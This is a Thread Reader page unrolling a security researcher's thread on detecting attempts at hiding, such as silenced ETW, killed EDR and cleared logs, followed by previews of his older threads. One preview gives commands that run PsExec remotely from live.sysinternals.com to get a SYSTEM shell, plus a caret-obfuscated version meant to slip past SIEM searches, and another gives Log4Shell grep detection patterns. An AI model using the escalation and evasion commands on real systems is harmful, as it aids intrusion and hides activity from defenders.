Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Florian Roth ⚡️ Profile picture
@cyb3rops
Aug 7 3 tweets 1 min read Read on X
If your agent gets flooded - detect the flooding.
If code gets obfuscated - detect the obfuscation.
If ETW gets silenced - detect the silence.
If the EDR gets killed - detect the killing.
If logs get cleared - detect the clearing.

The act of hiding is often more suspicious than what’s being hidden.

It’s like a surveillance camera going black or freezing.
That is the signal.
I’ve been doing this successfully for years.

I detect obfuscated crap all the time.
People ask, “What is it?”
I say, “No fucking clue. Could be:
- a Themida-packed sample with a Microsoft copyright,
- a UPX-packed ELF with a 1-char filename,
- a PowerShell script that looks like static noise, or
- a fake svchost.exe with no Microsoft copyright.”

I don’t need to know what it is.
It’s obviously shady.
That’s enough to detect it - and deal with it.
There’s a Chinese saying that fits perfectly: 欲蓋彌彰
The more you try to hide it, the more obvious it becomes.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Florian Roth ⚡️

Florian Roth ⚡️ Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @cyb3rops

Florian Roth ⚡️ Profile picture
Feb 24, 2022
I consider disabling my free tools on systems with certain language and time zone settings

e.g. "Russian" language + timezone somewhere within "Russia" > "sorry, I can't run here"

Opinions?
To be fair, the Russian aggression against Ukraine would only be the trigger and not the cause.
We are not allowed to & refrain from selling to certain countries but we give away "Lite" versions for free.
RU's invasion is just the trigger that reminded me of that idea.
I would obviously include China, North Korea and Iran in these filters to treat them equally
Read 5 tweets
Florian Roth ⚡️ Profile picture
Dec 11, 2021
1/ #Log4Shell Status determination

# Block Rules / Log-Based Detection
There's no effective or rather gapless way to detect attacks that use log4shell due to the many ways to obfuscate the strings.
Don't put too much trust in any filter/detection pattern. All can be bypassed.
..
2/ # Behaviour Based Detection

We thought about network based detection, but it could be any remote port and any remote system. Java can have many legitimate outgoing connections & often has suspicious sub processes.
3/ # Vulnerability Detection

It's difficult to find vulnerable software. It could be the web app, the ticket mgmt that receives contact form content or the backup software. Vuln scanners won't give a complete picture.
Discovery could take months.
Try to use the Canary Tokens.
Read 6 tweets
Florian Roth ⚡️ Profile picture
Dec 10, 2021
Quick check in /var/log folder or where your apps store their logs

sudo grep -r '${jndi:ldap://' /var/log

#log4j #log4jrce
If you find something, please send me a redacted version of it - I'd like to see log lines of real world exploitation attempts
Improved version

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log
Read 4 tweets
Florian Roth ⚡️ Profile picture
Oct 13, 2021
Elevate your cmd.exe to LOCAL_SYSTEM?

\\live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe

Have you ever seen this being used by an adversary? I haven't but I like it. Image
If you can't use the SMB protocol to hosts on the Internet, try WebDav over HTTPS

net use z: hxxps://live.sysinternals.com/tools && z:\PsExec.exe -s -c cmd.exe

(had to change the URL scheme because twitter would otherwise transform it - see screenshot) Image
And let's add some obfuscation to hide from sloppy signatures or case-sensitive searches in your SIEM

net use z: htT^pS://li^ve.sysInTer^nals.com/toOls && z:\Ps^EXeC.eXe -s c^md.e^xe Image
Read 5 tweets
Florian Roth ⚡️ Profile picture
Aug 1, 2021
I’d like to clarify my position on #Microsoft in general

Many things have improved over the last 10 years .. a lot .. especially with Windows 10/2016.
Today many fellow security researchers that I highly respect work there.

I criticize Microsoft’s response to recent ..
vulnerabilities (or design flaws) because I care about these things and believe that customers do care too.
I don’t think that it is fair / right to tell them to migrate to the cloud-based solution in order to get rid of these issues.

There are still few but good reasons ..
.. not to opt for the cloud.

I strongly believe that weaknesses in default configs that allow an attacker to escalate privs to Domain Admin should be addressed with a KB patch and not just a pointer to an advisory.
Many won’t read it.

I really hope that you continue the ..
Read 4 tweets
Florian Roth ⚡️ Profile picture
Oct 26, 2020
1/ Since we go through the #Githubification of InfoSec, knowing git has become an essential skill

My recommendations:

Read a tutorial to get to know the basic terminology
rogerdudler.github.io/git-guide/

Do an interactive training but I'd consider it optional
katacoda.com/courses/git
2/
For newcomers or occasional users I'd recommend a GUI

- Github Desktop (Windows, Linux, macOS)
desktop.github.com
github.com/shiftkey/deskt…
- SourceTree (macOS, Windows)
sourcetreeapp.com
- GitKraken (Windows, Linux, macOS)
gitkraken.com

...
3/ What you'll need in practice is called "pull requests", often from your own forked version of another repository

docs.github.com/en/free-pro-te…

It goes like this:
1. Create a fork
2. Modify the fork, add files, change content
3. Create pull request for the original repository
Read 5 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

Send Email!

:(